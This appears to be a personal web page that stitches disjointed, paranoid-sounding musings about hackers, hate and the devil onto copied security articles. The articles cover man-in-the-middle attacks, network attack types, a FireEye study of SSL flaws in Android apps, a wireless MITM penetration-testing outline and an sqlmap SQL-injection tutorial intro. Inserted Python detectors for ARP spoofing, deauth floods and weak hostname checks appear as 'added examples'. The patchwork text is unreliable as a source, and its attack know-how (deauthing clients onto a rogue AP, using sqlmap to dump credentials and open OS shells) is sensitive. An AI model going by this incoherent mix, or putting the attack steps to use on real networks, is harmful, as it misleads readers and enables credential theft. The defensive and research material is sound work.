word..is press… in the middle…. if it was an “IT”..

hate plus hate equals…

hate plus hate equals… !?

when would it stop… meaning.. if “someone” can be set up… then those that hate can be set up also.. in a never ending destruction cycle… and those.. that “love it”.. what is for them…

http://www.searchquotes.com/quotation/I_don%27t_hate_you_I%27m_just_not_necessarily_excited_about_your_existence./639261/

they seek… a “death by dishonor”… “high”… or “intoxications”… then when they get it… it is not enough… they need more…

…attacking “others” without… “complete understanding”..etc…

there is a fetish that involves… network hacks only… meaning… once you take the computer away… do they… believe… any more… in what they are doing…

sometimes… yes… in the hope that they will again.. and that the “battle” is there to “attack” through another later… etc..

the real question is … why… or for what….?

meaning… what drives you… is it … hate …if so.. hate of what… if you have never met me… then why … would you say hate of prejudice… when we have not..have had a relationship… and if so…

are you a “hired hacker” or a “persuaded hacker”… meaning… you are on a “cause stalking” or “righteous mission”.. meaning.. you understand all things.. to discern right and wrong with 100 percent … past, present and future”… the same… “total understanding”

then take break for a second and think about… the who is giving you “credit” and “resources” to do the thing you are doing” …

meaning… “are “we” A Paths”…? being controlled by those that are “more intelligent than” us.. combined or summed up..?

is there a way to test that…

can faith be a measure of “systematic” intelligent hacking of the system”

they say the devil is patient… could that mean more patient than all humans combined… ever….( or with the combination of all human effort in this world…with patience….)

how would we measure that…?

would you look at “someone” else.. and think is it that person or that other person… and never understand… something greater… than even “us”…

is faith an understanding… beyond .. .even us… in view of “us”…

yet… all apathetic… viewing of each other is only… “us”…

existentialist distress and cries … are we alone… in a complex mess.. that spins the world… as a heads… spin the “fetty”… in.. too… a 2fer… of which you watch bleeding on the floor…in the tears.. of broken “dreams of …..peace”…

https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/

https://www.hackthissite.org/

Thwarting the Man-in-the-Middle

can we trust any certificates…or server certificates…?

can you surf without them?


Do you know what a man-in-the-middle attack is? More importantly, do you know how to prevent one?

Cybercafes and libraries are perfect places to surf the Internet in a relaxed atmosphere. Unfortunately, they are also the perfect place for something else: man-in-the-middle (MITM) attacks.

An MITM Attack Is Like a Game: But They’re Playing with Your Information

An MITM attack is just like the childhood game of keep away, where two people throw a ball back and forth and a person in the middle tries to take the ball.

This childhood game is what happens in a MITM attack with a few key differences; rather than playing in a park, users are on their computer. And, instead of passing a ball back and forth, they’re passing their personal information. But the biggest difference is that unlike the children with the ball, users are unaware that the MITM is trying to get their information.

Public WiFi Is a Playground for Hackers

An attacker can use readily available sniffing tools at a cybercafe, coffee shop, library, hotel, or university to discover the IP addresses of potential victims and of the WiFi router on the network.

Through ARP spoofing, the attacker sends forged ARP replies that bind the router’s IP address to the attacker’s own MAC address, so the victim’s traffic flows through the attacker’s computer before reaching the router or hotspot. In essence, the attacker’s computer becomes (at least as far as the victim’s computer is concerned) the WiFi hotspot.

While in this position, the attacker can read anything passed between the user and the router that is not itself encrypted (usernames and passwords, credit card numbers and PINs, account numbers, and any other sensitive information sent over plain HTTP). Traffic protected by TLS stays unreadable unless the attacker can also get the victim to accept a forged certificate, which is why the certificate warnings covered in the tips below matter.
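The ARP spoofing step described above leaves a trace on the wire that a passive monitor can catch. The Python below is an added example and is not part of the DigiCert article: it replays a constructed set of ARP request/reply records (the gateway 192.168.1.1, the victim 192.168.1.20 and the attacker MAC de:ad:be:ef:00:01 are all invented for the illustration) through a small detector that flags the two signs of cache poisoning, an IP address whose MAC binding changes, and a reply that no recent request asked for. A real deployment would feed it frames from a capture library instead of the inline list.

```python
"""Passive ARP monitor that flags the cache-poisoning pattern used for LAN MITM.

Added example with constructed data; not from the DigiCert article.
"""
from collections import namedtuple

ARP_REQUEST = 1   # opcodes from RFC 826
ARP_REPLY = 2
REPLY_WINDOW_SECONDS = 2.0   # a reply arriving later than this after its request is unsolicited

ArpFrame = namedtuple("ArpFrame", "ts opcode sender_ip sender_mac target_ip")

# Invented addresses for the example network.
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "00:11:22:33:44:55"
VICTIM_IP = "192.168.1.20"
VICTIM_MAC = "66:77:88:99:aa:bb"
ATTACKER_MAC = "de:ad:be:ef:00:01"

# Constructed capture: normal request/reply pairs, then from t=30.0 the
# attacker answers for the gateway's IP and for the victim's IP (poisoning
# both caches so traffic in both directions crosses the attacker's host).
SAMPLE_ARP = [
    ArpFrame(0.0,  ARP_REQUEST, VICTIM_IP,  VICTIM_MAC,   GATEWAY_IP),
    ArpFrame(0.1,  ARP_REPLY,   GATEWAY_IP, GATEWAY_MAC,  VICTIM_IP),
    ArpFrame(12.0, ARP_REQUEST, GATEWAY_IP, GATEWAY_MAC,  VICTIM_IP),
    ArpFrame(12.1, ARP_REPLY,   VICTIM_IP,  VICTIM_MAC,   GATEWAY_IP),
    ArpFrame(30.0, ARP_REPLY,   GATEWAY_IP, ATTACKER_MAC, VICTIM_IP),
    ArpFrame(30.2, ARP_REPLY,   VICTIM_IP,  ATTACKER_MAC, GATEWAY_IP),
    ArpFrame(32.0, ARP_REPLY,   GATEWAY_IP, ATTACKER_MAC, VICTIM_IP),
]


def detect_arp_spoof(frames, trusted=None):
    """Return alerts for ARP replies that look like cache poisoning.

    frames:  iterable of ArpFrame (or equal-length tuples).
    trusted: optional dict of IP -> MAC bindings known in advance, e.g. the
             gateway; any other binding is learned from the first reply seen
             and never overwritten, so a later conflicting reply is reported.
    """
    bindings = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    last_request = {}   # (requester_ip, asked_ip) -> timestamp of that request
    alerts = []
    for ts, opcode, sender_ip, sender_mac, target_ip in frames:
        sender_mac = sender_mac.lower()
        if opcode == ARP_REQUEST:
            last_request[(sender_ip, target_ip)] = ts
            continue
        if opcode != ARP_REPLY:
            continue
        reasons = []
        known = bindings.get(sender_ip)
        if known is None:
            bindings[sender_ip] = sender_mac
        elif known != sender_mac:
            reasons.append("mac-change:%s->%s" % (known, sender_mac))
        # A genuine reply answers a request the target sent moments ago.
        asked_at = last_request.get((target_ip, sender_ip))
        if asked_at is None or ts - asked_at > REPLY_WINDOW_SECONDS:
            reasons.append("unsolicited")
        if reasons:
            alerts.append({"ts": ts, "ip": sender_ip, "mac": sender_mac, "reasons": reasons})
    return alerts


def suspect_macs(alerts):
    """MAC addresses that claimed an IP already bound to a different MAC."""
    return {a["mac"] for a in alerts if any(r.startswith("mac-change") for r in a["reasons"])}


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP, trusted={GATEWAY_IP: GATEWAY_MAC}):
        print("%6.1fs  %-14s claimed by %s  (%s)"
              % (alert["ts"], alert["ip"], alert["mac"], ", ".join(alert["reasons"])))
```

Seeding the gateway binding through `trusted` is the important operational choice: a detector that only learns from traffic will trust whichever reply it sees first, so on a network that was already poisoned when monitoring started it would treat the attacker's MAC as legitimate.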


The Potential Repercussions for Man-in-the-Middle Are Huge

You can imagine what an attacker could do with your sensitive information. If an attacker intercepted your username and password while you were on a website the attacker could do anything on there without you knowing.

Once you found out that your username and password had been compromised your trust in that particular website could be irrevocably damaged. All this can be done within a few minutes, by anyone with access to the software and without you knowing that your information had been compromised.

However, as with any attack, there are ways to help prevent you and your users from becoming victims.

Tips to Prevent and Avoid MITM Attacks

Avoid sending or accessing sensitive information over an open network

Unless you are absolutely sure that you are safe, leave these types of Internet usage for a secure network.

Trust your browser

Web browsers come with a list of trusted Certificate Authorities (CA). If there is a problem with the certificate because it has expired or was not installed correctly, a warning message will pop up. Similar messages will pop up if the certificate is not trusted or if it is a self-signed certificate.

Educate users on visual cues

There are a couple of visual cues admins can educate users to look for before they log in to an email or bank account. The first is the https in the address bar (shown as a padlock in current browsers). The s means the connection is encrypted and the server presented a certificate the browser accepted; it does not vouch for who operates the site. When it is absent, users should not enter sensitive information into the website.

Pay attention to warning messages

Any keen, or even not so keen, Internet surfer has no doubt received a message such as “Do you trust this computer?” or “This Connection is Untrusted.” With so many of these messages popping up, it is very easy for a user to become frustrated. Frustrated users may click through the warning and continue with what they were doing, which is exactly what an MITM attacker presenting a forged certificate needs them to do.

Use EV SSL Certificates on public-facing pages

There are benefits to using an EV SSL certificate. At the time this was written, the green browser address bar shown for an EV certificate was a stronger visual cue for users than https alone, and studies reported that customers were more likely to purchase from a site displaying an indicator that the site is secure. Note that the major browsers removed the distinct EV indicator from the address bar in 2019 (Chrome 77, Firefox 70), so an EV certificate no longer gives users a visible cue that distinguishes it from any other valid certificate.

By securing your site with an EV SSL certificate you are showing your clients that you care about keeping their information safe.

DigiCert Is Working to Keep You Safe

While man-in-the-middle attacks aren’t new, it’s important to make sure you’re taking the necessary precautions to guard against security attacks.

As an SSL Certificate provider, DigiCert is aware of the threats to your data security and is constantly working to prevent cyber criminals from accessing your data. We promote high-assurance certificates and are on the forefront of emerging markets, as demonstrated by our work with securing healthcare record transfers and using certificates to secure the Internet of Things.

Common Types of Network Attacks

Without security measures and controls in place, your data might be subjected to an attack. Some attacks are passive, meaning information is monitored; others are active, meaning the information is altered with intent to corrupt or destroy the data or the network itself.

Your networks and data are vulnerable to any of the following types of attacks if you do not have a security plan in place.

Eavesdropping

In general, the majority of network communications occur in an unsecured or “cleartext” format, which allows an attacker who has gained access to data paths in your network to “listen in” on or interpret (read) the traffic. When an attacker is eavesdropping on your communications, it is referred to as sniffing or snooping. The ability of an eavesdropper to monitor the network is generally the biggest security problem that administrators face in an enterprise. Without strong, cryptographically based encryption, your data can be read by others as it traverses the network.

Data Modification

After an attacker has read your data, the next logical step is to alter it. An attacker can modify the data in the packet without the knowledge of the sender or receiver. Even if you do not require confidentiality for all communications, you do not want any of your messages to be modified in transit. For example, if you are exchanging purchase requisitions, you do not want the items, amounts, or billing information to be modified.

Identity Spoofing (IP Address Spoofing)

Most networks and operating systems use the IP address of a computer to identify a valid entity. In certain cases, it is possible for an IP address to be falsely assumed; this is identity spoofing. An attacker might also use special programs to construct IP packets that appear to originate from valid addresses inside the corporate intranet.

After gaining access to the network with a valid IP address, the attacker can modify, reroute, or delete your data. The attacker can also conduct other types of attacks, as described in the following sections.

Password-Based Attacks

A common denominator of most operating system and network security plans is password-based access control. This means your access rights to a computer and network resources are determined by who you are, that is, your user name and your password.

Older applications do not always protect identity information as it is passed through the network for validation. This might allow an eavesdropper to gain access to the network by posing as a valid user.

When an attacker finds a valid user account, the attacker has the same rights as the real user. Therefore, if the user has administrator-level rights, the attacker also can create accounts for subsequent access at a later time.

After gaining access to your network with a valid account, an attacker can do any of the following:

  • Obtain lists of valid user and computer names and network information.
  • Modify server and network configurations, including access controls and routing tables.
  • Modify, reroute, or delete your data.

Denial-of-Service Attack

Unlike a password-based attack, the denial-of-service attack prevents normal use of your computer or network by valid users.

After gaining access to your network, the attacker can do any of the following:

  • Divert the attention of your internal Information Systems staff so that they do not see the intrusion immediately, which allows the attacker to make more attacks during the diversion.
  • Send invalid data to applications or network services, which causes abnormal termination or behavior of the applications or services.
  • Flood a computer or the entire network with traffic until a shutdown occurs because of the overload.
  • Block traffic, which results in a loss of access to network resources by authorized users.

Man-in-the-Middle Attack

As the name indicates, a man-in-the-middle attack occurs when someone between you and the person with whom you are communicating is actively monitoring, capturing, and controlling your communication transparently. For example, the attacker can re-route a data exchange. When computers are communicating at low levels of the network layer, the computers might not be able to determine with whom they are exchanging data.

Man-in-the-middle attacks are like someone assuming your identity in order to read your message. The person on the other end might believe it is you because the attacker might be actively replying as you to keep the exchange going and gain more information. This attack is capable of the same damage as an application-layer attack, described later in this section.

Compromised-Key Attack

A key is a secret code or number necessary to interpret secured information. Although obtaining a key is a difficult and resource-intensive process for an attacker, it is possible. After an attacker obtains a key, that key is referred to as a compromised key.

An attacker uses the compromised key to gain access to a secured communication without the sender or receiver being aware of the attack. With the compromised key, the attacker can decrypt or modify data, and try to use the compromised key to compute additional keys, which might allow the attacker access to other secured communications.

Sniffer Attack

A sniffer is an application or device that can read, monitor, and capture network data exchanges and read network packets. If the packets are not encrypted, a sniffer provides a full view of the data inside the packet. Even encapsulated (tunneled) packets can be opened and read unless they are encrypted with a key the attacker does not have.

Using a sniffer, an attacker can do any of the following:

  • Analyze your network and gain information to eventually cause your network to crash or to become corrupted.
  • Read your communications.

Application-Layer Attack

An application-layer attack targets application servers by deliberately causing a fault in a server’s operating system or applications. This results in the attacker gaining the ability to bypass normal access controls. The attacker takes advantage of this situation, gaining control of your application, system, or network, and can do any of the following:

  • Read, add, delete, or modify your data or operating system.
  • Introduce a virus program that uses your computers and software applications to copy viruses throughout your network.
  • Introduce a sniffer program to analyze your network and gain information that can eventually be used to crash or to corrupt your systems and network.
  • Abnormally terminate your data applications or operating systems.
  • Disable other security controls to enable future attacks.

https://technet.microsoft.com/en-us/library/cc959354.aspx

temporary …. shutdowns… coming soon.. meaning… are scheduled… shutdowns.. part of a … “tactics” for or against s… that “quota”…?


SSL Vulnerabilities in the Google Play 1,000 Most Downloaded Applications

We reviewed the 1,000 most-downloaded free applications in the Google Play store as of July 17, 2014. Of these, 674 (~68%) have at least one of the three SSL vulnerabilities that we studied. In Figure 1, we present the number of vulnerable applications we found in each category:

  • Using trust managers that do not check certificates
    • Of the 614 applications that use SSL/TLS to communicate with a remote server, 448 (~73%) do not check certificates
  • Using hostname verifiers that do nothing
    • 50 (~8%) use their own hostname verifiers that do not check hostnames
  • Ignoring SSL errors in Webkit
    • Of the 285 that use Webkit, 219 (~77%) ignore SSL errors generated in Webkit


Figure 1. SSL vulnerabilities in the Google Play top 1000 applications

SSL Vulnerabilities at Large

We analyzed roughly 10,000 applications from the Google Play store. This was a random sample of free applications. Roughly 4,000 (40%) use trust managers that do not check server certificates, exposing any data they exchange with their servers to potential theft. Furthermore, around 750 (7%) applications use hostname verifiers that do not check hostnames, implying that they are incapable of detecting redirection attacks where the attacker redirects the server request to a malicious webserver controlled by the attacker. Finally, 1,300 (13%) do not check SSL errors when they use Webkit.

Case Studies (Applications rendered vulnerable due to vulnerable libraries)

Applications may use third-party libraries to enable part of their functionality. When these libraries have baked-in vulnerabilities, they are particularly dangerous because they make all applications that use them, and frequently the devices that run them, vulnerable. Furthermore, these vulnerabilities are not weaknesses in the applications themselves, but in the features they rely upon for functionality.

Flurry. Flurry is the number-one ranked ad library in the market used by 9,702 out of 70,000+ Google Play apps with 50,000 or more downloads. These applications have been downloaded over 8.7 billion times. As with many ad libraries, Flurry (prior to version 3.4) uses HTTPS with a vulnerable trust manager to upload information like device IMEI and location.

In a proof of concept for an MITM attack, we successfully used a vulnerable version of Flurry to capture the information sent to the remote server https://data.flurry.com. We successfully matched the location of the simulation device against the data being sent by Flurry. In Figure 2, we show a hexdump of the data we captured during this MITM attack.

Ad libraries enable the delivery of targeted advertisements by transmitting sensitive user information, so it is essential that they use HTTPS correctly, with working certificate validation, so that the data is protected against MITM attacks. The potential privacy breach is compounded when users are unaware of the ad libraries used and of how their personal information can be read by unintended recipients.


Figure 2. Hexdump of the data that is being sent using insecure HTTPS

The presence of this vulnerability was communicated to the Flurry developers. They acknowledged the vulnerability was addressed starting in version 3.4 of the ad library.

Chartboost. Chartboost is an ad library used by 5,170 of 70,000+ Google Play apps with 50,000 or more downloads. The aggregate download count for all these applications is over 4.5 billion. Chartboost also used a trust manager that is vulnerable to MITM attacks. In this experimental setup, we intercepted traffic that contains the device IMEI sent over SSL/TLS sockets. While Chartboost has addressed this vulnerability after version 2.0.1, a number of applications with over 5 million downloads in the Google Play store still use vulnerable versions of Chartboost.

The presence of these vulnerabilities was communicated to the developers of Chartboost. They acknowledged that the vulnerability was addressed in a release subsequent to 2.0.1 of the ad library.

Case Studies (Applications that are inherently vulnerable)

Camera360 Ultimate. This is an application that has more than 250 million downloads worldwide. The following is the description of the application from the Google Play store.

Camera360, loved by more than 250 million users globally, is No.1 camera app in many countries. Together with HelloCamera, Movie360, and Pink360, Camera360 provides a comprehensive suite of professional yet fun mobile photography options.

To make your life even easier, Camera360 has introduced Camera360 Cloud, a cloud platform that can help you manage, edit, store, and share your photos all in one place. Join the millions of users in enjoying these FREE services!

Besides inheriting SSL vulnerabilities from the ad libraries used by the application, none of the application’s own trust managers checks server certificates. In another proof-of-concept for an MITM attack that exploits these vulnerabilities, we intercepted all HTTPS traffic between the application and the remote servers it used, allowing us to potentially:

  1. Steal or inject photos/albums at random;
  2. Steal user’s login “local key” to the Camera360 cloud, and many other local device/user specifications (device model, android version, user nickname, user email account, etc.); and
  3. Intercept user credentials (Facebook, Twitter, Sina, QQ, etc.), or inject fake login pages/malicious Javascript to steal any account credentials.

The app has Javascript Binding Over HTTP (JBOH) together with many powerful permissions (camera, audio recording, video recording, etc.), which opens the door to even more sophisticated attacks.

These vulnerabilities were communicated to the Camera360 developers, who were highly proactive in fixing the reported issues and releasing an update addressing them on July 29, 2014.

Application “X”. This application has over 100M downloads and is one of the fastest-growing applications in the Google Play marketplace. Like Camera360, Application “X” does not check server certificates when establishing SSL connections. Its core functionality pushes images of interest to users. This functionality can be hijacked using an MITM attack, allowing an attacker to inject malicious images into the application, launch a denial-of-service attack, or worse, hold a user’s data for ransom by way of a DoS attack.

Repeated attempts to contact the developers of Application “X” went unanswered. We therefore chose to anonymize the name of the application until a fix is put in place.

Best Practices

For a detailed explanation of common SSL pitfalls and ways to alleviate them, please see Android Security-SSL. An application that connects to a third-party web service through the platform’s default SSL/TLS stack gets server certificate and hostname verification automatically. These platforms usually trust more than 100 CAs and will validate any third-party server that presents a certificate signed by any of them.

If the server certificate is self-signed or comes from a CA the Android platform doesn’t trust, it requires the attention of the application developer. In these cases, the steps to use a custom trust manager are as follows:

  1. Create a KeyStore and set its certificate entry to the certificate to authenticate against
  2. Initialize a TrustManager instance with the KeyStore
  3. Use this instance of the TrustManager class in SSLContext objects used to establish remote server connections
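The three steps above build a trust manager that validates the certificate chain; checking that the certificate is for the host the app meant to reach is the other half, and it is the check the “hostname verifiers that do nothing” category earlier in the article throws away. The Python below is an added example, not FireEye’s tooling and not any app’s code: it implements the DNS-name matching rules of RFC 6125 as current TLS libraries apply them (case-insensitive exact match, a single leftmost wildcard label that must be followed by at least two labels and matches exactly one label, no match for IP literals, and the subject CN ignored in favour of subjectAltName) and contrasts it with a verifier that accepts everything. The certificate dictionaries are constructed in the shape Python’s ssl.SSLSocket.getpeercert() returns; data.flurry.com is the host from the Flurry case study, attacker.example is invented.

```python
"""Hostname verification for a TLS peer certificate, strict vs. do-nothing.

Added example; the certificate dicts are constructed in the shape returned by
ssl.SSLSocket.getpeercert() and are not real certificates.
"""
import ipaddress


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def hostname_matches(hostname, dns_names):
    """True if hostname is covered by one of the certificate's DNS SAN entries.

    Rules (RFC 6125 as applied by current browsers and TLS libraries):
      * comparison is case-insensitive and ignores a trailing dot;
      * an IP literal never matches a DNS name (it needs an iPAddress SAN);
      * '*' is allowed only as the whole leftmost label, must be followed by at
        least two more labels (so '*.com' is rejected), and matches exactly one
        label ('*.flurry.com' covers data.flurry.com, not a.b.flurry.com or
        flurry.com).
    """
    host = hostname.rstrip(".").lower()
    if not host or _is_ip_literal(host):
        return False
    host_labels = host.split(".")
    if any(not label for label in host_labels):
        return False
    for name in dns_names:
        pat_labels = name.rstrip(".").lower().split(".")
        if "*" not in name:
            if pat_labels == host_labels:
                return True
            continue
        if (pat_labels[0] != "*" or len(pat_labels) < 3
                or any("*" in label for label in pat_labels[1:])):
            continue   # partial ('d*.example') or over-broad wildcard: no match
        if len(host_labels) == len(pat_labels) and host_labels[1:] == pat_labels[1:]:
            return True
    return False


def null_verifier(hostname, dns_names):
    """What the 'hostname verifiers that do nothing' in the study amount to."""
    return True


def san_dns_names(peercert):
    """DNS names from a getpeercert()-style dict. The subject CN is deliberately
    not consulted: a self-signed MITM certificate can put anything there."""
    return [value for kind, value in peercert.get("subjectAltName", ()) if kind == "DNS"]


def verify_peer(hostname, peercert, verifier=hostname_matches):
    """Apply the chosen verifier to the names the certificate actually carries."""
    return verifier(hostname, san_dns_names(peercert))


# Constructed certificates for the Flurry scenario in the article.
LEGIT_CERT = {
    "subject": ((("commonName", "data.flurry.com"),),),
    "subjectAltName": (("DNS", "data.flurry.com"), ("DNS", "*.flurry.com")),
}
MITM_CERT = {   # what an interception proxy might present: CN copied, SAN honest
    "subject": ((("commonName", "data.flurry.com"),),),
    "subjectAltName": (("DNS", "*.attacker.example"),),
}


if __name__ == "__main__":
    for label, cert in (("legitimate", LEGIT_CERT), ("interception", MITM_CERT)):
        print("%-13s strict=%s  null=%s" % (label,
              verify_peer("data.flurry.com", cert),
              verify_peer("data.flurry.com", cert, verifier=null_verifier)))
```

The last two lines of output are the whole point: with the null verifier the interception certificate is accepted for data.flurry.com, which is exactly the condition under which the hexdump in Figure 2 was captured.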

Mobile device users can protect themselves by not accessing websites that require user login credentials when using public wi-fi networks. This in itself, with general vigilance in opening emails from unknown sources, will go a long way in protecting sensitive information from MITM attacks.

We hope that publications like this encourage application developers to stay current on the versions of third-party libraries they use, and to talk to the developers of third-party libraries to ensure the end users’ privacy is not compromised through backdoors.

Acknowledgments: We would like to thank Tao Wei and Dawn Song for their technical inputs that lead to developing of the SSL vulnerability detection capability, and Rebecca Stroder, Kyrksen Storer and the team behind the FireEye Mobile Threat Prevention Platform for their feedback. We also acknowledge the developers of Camera360 Ultimate, Flurry, and Chartboost for being proactive in fixing all reported issues.

Appendix: MITM Attacker and the Mechanics of an MITM Attack

As shown in Figure 3, a Man-In-The-Middle (MITM) attack works as follows:

  • Alice initiates a conversation with Bob
  • Mallory intercepts the conversation and relays the request to Bob
  • Bob responds, Mallory intercepts the response and forwards it to Alice

Neither Alice nor Bob are aware of Mallory’s presence. In our scenario, Alice is an Android application and Bob is the remote server. Mallory is a Man-In-The-Middle attacker with Internet access. Correct use of the platform SSL/TLS library would prevent Mallory from masquerading as Bob in his communication with Alice, and as Alice in her communication with Bob.


Figure 3. A Man-In-The-Middle attack flow

An MITM attacker has access to the Internet and controls a network proxy to direct all traffic originating from a network, such as a wi-fi network, to the Internet. Setting up an MITM attack is as easy as having access to the network proxy and using an off-the-shelf MITM proxy in place of a standard proxy. A standard proxy is limited to setting up an opaque conduit for all communication with no mechanism to read the data that is actually sent. An MITM proxy, on the other hand, plays the role of Mallory in Figure 3, masquerading as the remote server to mobile clients and as the mobile client to the remote server. Public wi-fi networks such as those in airports, cafes, etc., are open to exploitation by such MITM attackers. These networks use basic configurations without firewalls, VPNs, or intrusion detection systems. Attackers build open networks to snoop data that passes between user devices and remote servers. Sophisticated MITM attackers may use phishing emails to change a user’s device configurations, directing all Internet traffic originating from the device to a proxy server they control.

https://www.fireeye.com/blog/threat-research/2014/08/s

“Two years ago, IOActive tested 40 mobile banking apps and found that 40 per cent of them are vulnerable to MITM attacks,” the firm said.

“Another group of researchers from Leibniz University of Hanover and Philipps University of Marburg found that eight per cent of popular Android apps fail to verify certificates.

“A passive MITM attack against these mobile apps is very real when you use a public WiFi hotspot. The attack is also possible in the case of a web server accessing a third-party API.”

TLS security ‘neglect’ exposes web users to man-in-the-middle attacks

http://www.theinquirer.net/inquirer/news/2453541/tls-security-neglect-exposes-web-users-to-man-in-the-middle-attacks

http://www.globalspec.com/reference/47491/203279/chapter-9-using-man-in-the-middle-attacks-to-your-advantage


From WarDriving & Wireless Penetration Testing

Introduction

This chapter discusses the hardware required for a wireless Man-in-the-Middle (MITM) attack and demonstrates how to:

  • Install and configure a MITM attack laptop
  • Identify and compromise a MITM target wireless access point (AP)
  • De-authenticate wireless clients from the target AP and have them associate to the MITM AP
  • Provide a basic example of MITM attack by spoofing a Web application in order to harvest user credentials.

What is a MITM Attack?

A MITM attack allows attackers to intercept and modify traffic to and from a wireless network without the wireless client knowing that the link has been compromised. The main goal of this attack during a wireless penetration test is to compromise user account credentials. The MITM attack is typically used to capture user account information on Web-based applications, capture passwords sent in clear text, and sniff and crack Windows password hashes.

MITM Attack Design

A basic MITM attack connects the wireless client (the victim) to the attacker’s access point, which then forwards the traffic to the real (authorized) AP. A typical MITM design consists of the components shown in Figure 9.1.


Figure 9.1: Typical MITM Design
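Both the de-authentication step in the chapter outline and the rogue AP in Figure 9.1 leave a signature in the management frames that a monitor-mode interface can see. The Python below is an added example, not from the WarDriving book: it runs over a constructed list of beacon and de-authentication frames (the SSID ACME-WIFI, the authorized BSSIDs and the rogue BSSID de:ad:be:ef:00:01 are invented) and raises one alert for a burst of de-authentication frames sent in the name of a legitimate AP and another for a beacon advertising a known SSID from a BSSID that is not on the authorized list. De-authentication frames are unauthenticated unless the network enforces 802.11w protected management frames, which is why forging them works in the first place.

```python
"""Detect the de-authentication + rogue-AP pattern from 802.11 management frames.

Added example with constructed frames; not from the WarDriving book.
"""
from collections import defaultdict, deque, namedtuple

Frame = namedtuple("Frame", "ts subtype src dst bssid ssid")   # subtype: 'beacon' or 'deauth'

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH_THRESHOLD = 10     # this many deauth frames from one BSSID ...
DEAUTH_WINDOW = 1.0       # ... within this many seconds is a flood

# Invented network: two authorized APs for SSID ACME-WIFI and one rogue.
LEGIT_AP_1 = "00:11:22:aa:bb:01"
LEGIT_AP_2 = "00:11:22:aa:bb:02"
ROGUE_AP = "de:ad:be:ef:00:01"
AUTHORIZED = {"ACME-WIFI": {LEGIT_AP_1, LEGIT_AP_2}}


def _beacon(ts, bssid, ssid):
    return Frame(ts, "beacon", bssid, BROADCAST, bssid, ssid)


# Constructed capture: normal beacons, then 12 broadcast deauths in 0.6 s with
# the source address forged as the real AP, then the evil twin starts beaconing.
SAMPLE_FRAMES = sorted(
    [_beacon(0.1 * i, LEGIT_AP_1, "ACME-WIFI") for i in range(5)]
    + [_beacon(0.1 * i + 0.05, LEGIT_AP_2, "ACME-WIFI") for i in range(5)]
    + [Frame(20.0 + 0.05 * i, "deauth", LEGIT_AP_1, BROADCAST, LEGIT_AP_1, None)
       for i in range(12)]
    + [_beacon(21.0, ROGUE_AP, "ACME-WIFI")],
    key=lambda f: f.ts,
)


def detect_wireless_mitm(frames, authorized):
    """Return alerts for deauth floods and beacons from unauthorized BSSIDs.

    frames: iterable of Frame; authorized: dict SSID -> set of legitimate BSSIDs.
    Each BSSID is reported once per alert type so a long capture stays readable.
    """
    alerts = []
    recent_deauth = defaultdict(deque)   # bssid -> timestamps inside the window
    reported = set()
    for f in frames:
        if f.subtype == "beacon":
            # Same SSID from a BSSID we do not own: the evil twin of Figure 9.1.
            if f.ssid in authorized and f.bssid not in authorized[f.ssid]:
                key = ("evil-twin", f.bssid)
                if key not in reported:
                    reported.add(key)
                    alerts.append({"ts": f.ts, "type": "evil-twin",
                                   "ssid": f.ssid, "bssid": f.bssid})
        elif f.subtype == "deauth":
            window = recent_deauth[f.bssid]
            window.append(f.ts)
            while window and f.ts - window[0] > DEAUTH_WINDOW:
                window.popleft()
            key = ("deauth-flood", f.bssid)
            if len(window) >= DEAUTH_THRESHOLD and key not in reported:
                reported.add(key)
                alerts.append({"ts": f.ts, "type": "deauth-flood", "bssid": f.bssid,
                               "count": len(window), "broadcast": f.dst == BROADCAST})
    return alerts


if __name__ == "__main__":
    for a in detect_wireless_mitm(SAMPLE_FRAMES, AUTHORIZED):
        print("%6.2fs  %s  %s" % (a["ts"], a["type"], a["bssid"]))
```

The deauth rule keys on the BSSID rather than on the true transmitter because, on a pre-802.11w network, the monitor has no way to tell the forged frames from the AP's own; the volume is the tell, and a broadcast destination (every client kicked at once) is the usual prelude to clients roaming onto the MITM AP.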

The Target AP(s)

A wireless penetration test exercises the security controls of wireless networks (referred to here as target wireless access points). To perform a MITM attack, an attacker needs one or more target APs; since many organizations deploy hundreds of APs for their employees, there is rarely a shortage of targets.

The Victim Wireless Client(s)

Wireless clients or the victim(s) of the MITM attack, has an initial wireless connection to the target…



https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/

SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example when user input is incorrectly filtered for string literal escape characters embedded in SQL statements, or when user input is not strongly typed and is unexpectedly executed. SQL injection is mostly known as an attack vector against websites but can be used to attack any type of SQL database. In this guide I will show you how to use sqlmap on Kali Linux to exploit SQL injection in a website (more specifically its database) and extract usernames and passwords.

What is SQLMAP

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

  1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  5. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  6. Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  7. Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.
  8. Support to download and upload any file from the file system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  9. Support to execute arbitrary commands and retrieve their standard output on the operating system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
